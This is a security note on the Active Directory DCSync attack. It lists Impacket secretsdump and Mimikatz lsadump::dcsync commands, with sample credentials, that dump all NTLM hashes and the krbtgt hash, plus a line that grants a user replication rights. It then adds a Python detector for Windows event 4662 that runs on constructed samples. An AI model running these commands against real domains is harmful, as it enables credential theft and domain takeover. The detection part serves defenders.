DCSync abuses Active Directory replication: an account holding Domain Admin or directory replication rights can ask a domain controller to replicate account secrets the way a peer DC would, yielding every NTLM hash in the domain.
```text
# Using Impacket secretsdump.py:
python3 secretsdump.py corp.local/administrator:Admin@2024@192.168.1.10

# Using Mimikatz (from Windows with DA rights):
lsadump::dcsync /domain:corp.local /user:administrator
lsadump::dcsync /domain:corp.local /all /csv

# Dump krbtgt hash (needed for Golden Ticket):
lsadump::dcsync /domain:corp.local /user:krbtgt

# With just replication rights (not full DA):
# Grant replication rights to a user:
# Add-ObjectACL -PrincipalIdentity ram -Rights DCSync
```
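On the defensive side, a DCSync pull is visible as Security event 4662 on the domain controller, where a non-DC account exercises the replication control-access rights against the domain head. The following detector is an added example, not code from the original note; it assumes "Audit Directory Service Access" is enabled with a SACL on the domain object (otherwise 4662 is never written), uses constructed event bodies, and treats the `MSOL_` Azure AD Connect account prefix as an assumed legitimate replicator.

```python
# Added example (not from the original note): flag DCSync-style replication requests
# in Windows Security event 4662 bodies. All events below are constructed samples.
import re

# Extended rights a replication consumer needs; these are the well-known
# AD control-access-right GUIDs that show up in the 4662 Properties field.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def is_expected_replicator(account, allowlist=("MSOL_",)):
    """DC machine accounts (trailing $) and, as an assumption for this
    environment, the Azure AD Connect MSOL_ account legitimately replicate."""
    return account.endswith("$") or account.startswith(allowlist)

def parse_4662(text):
    """Return (subject account name, set of lowercase GUIDs) from a 4662 body."""
    acct = re.search(r"Account Name:\s*(\S+)", text)
    guids = re.findall(r"([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})", text, re.I)
    return (acct.group(1) if acct else None), {g.lower() for g in guids}

def find_dcsync(events):
    """List (account, rights) where a non-replicator exercised replication rights."""
    hits = []
    for body in events:
        acct, guids = parse_4662(body)
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        if acct and rights and not is_expected_replicator(acct):
            hits.append((acct, rights))
    return hits

SAMPLE_EVENTS = [  # constructed 4662 bodies, abbreviated to the relevant fields
    # Normal replication by a domain controller's machine account.
    "Subject: Account Name: DC01$ Account Domain: CORP\n"
    "Object Type: domainDNS Object Name: DC=corp,DC=local\n"
    "Properties: Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
    " {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    # A user account exercising both replication rights against the domain head.
    "Subject: Account Name: ram Account Domain: CORP\n"
    "Object Type: domainDNS Object Name: DC=corp,DC=local\n"
    "Properties: Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
    " {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    # Ordinary directory read carrying no replication right.
    "Subject: Account Name: jdoe Account Domain: CORP\n"
    "Object Type: domainDNS Object Name: DC=corp,DC=local\n"
    "Properties: Read Property {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
]
if __name__ == "__main__":
    for acct, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {acct}: {', '.join(rights)}")
```

In production, correlate the hit with the source address from the DC's logon events and with any recent ACL change on the domain object (event 5136), since granting the replication rights to a user, as the note's last step does, is itself the earlier signal.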